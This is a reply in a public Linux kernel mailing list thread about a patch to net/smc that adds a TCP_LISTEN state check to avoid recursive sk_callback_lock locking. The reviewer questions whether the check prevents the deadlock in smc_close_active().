> tries to take the same rwlock recursively in the same thread.  The nvmet
> TCP listener had to make the same state check before taking
> sk_callback_lock for this reason.
> 
> This issue was found by our static analysis tool and then manually
> reviewed against the current tree.
> 
> The grounded PoC kept the SMC listen callback installation path:
> 
>   smc_listen()
>   smc_clcsock_replace_cb()
>   sk_data_ready = smc_clcsock_data_ready()
> 
> It then modeled the close/flush carrier that invokes the installed
> sk_data_ready callback while sk_callback_lock is already held.  Lockdep
> reported the same-thread recursive acquisition:
> 
>   WARNING: possible recursive locking detected
>   smc_clcsock_data_ready+0xa/0x4d [vuln_msv]
>   smc_close_flush_work+0x1f/0x30 [vuln_msv]
>   *** DEADLOCK ***
> 
> Return before taking sk_callback_lock when the underlying TCP socket is no
> longer in TCP_LISTEN.  In that state there is no listen accept work to
> queue for SMC, and avoiding the callback lock mirrors the fix used by the
> TCP nvmet listener.
> 
> Fixes: 0558226cebee ("net/smc: Fix slab-out-of-bounds issue in fallback")
> Cc: stable@vger.kernel.org
> Signed-off-by: Runyu Xiao <runyu.xiao@seu.edu.cn>
> ---
>  net/smc/af_smc.c | 3 +++
>  1 file changed, 3 insertions(+)
> 
> diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
> index 6421c2e1c84d..1af4e3c333ff 100644
> --- a/net/smc/af_smc.c
> +++ b/net/smc/af_smc.c
> @@ -2631,6 +2631,9 @@ static void smc_clcsock_data_ready(struct sock *listen_clcsock)
>  {
>  	struct smc_sock *lsmc;
>  
> +	if (READ_ONCE(listen_clcsock->sk_state) != TCP_LISTEN)
> +		return;
> +

In smc_close_active(), the TCP socket remains in TCP_LISTEN state while
holding write_lock_bh(&smc->clcsock->sk->sk_callback_lock);. The patch's
state check would pass during this window, not preventing the recursive
lock scenario.
It's unclear whether it fully prevents the recursive locking scenario
described in the commit message for the specific code path in
smc_close_active().
Could you come up with exact deadlock scenario and how the patch
addresses it?

>  	read_lock_bh(&listen_clcsock->sk_callback_lock);
>  	lsmc = smc_clcsock_user_data(listen_clcsock);
>  	if (!lsmc)


^ permalink raw reply	[flat|nested] 9+ messages in thread

end of thread, other threads:[~2026-06-25  8:32 UTC | newest]

Thread overview: 9+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-06-17 15:28 [PATCH net] net/smc: avoid recursive sk_callback_lock in listen data_ready Runyu Xiao
2026-06-18  6:24 ` Mahanta Jambigi
2026-06-18 14:16   ` Runyu Xiao
2026-06-19  5:36     ` Mahanta Jambigi
2026-06-19  5:48 ` [PATCH net v2] " Runyu Xiao
2026-06-23 10:38   ` XIAO WU
2026-06-24 10:37     ` Runyu Xiao
2026-06-19  6:35 ` [PATCH net] " Dust Li
2026-06-25  8:32 ` Sidraya Jayagond

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox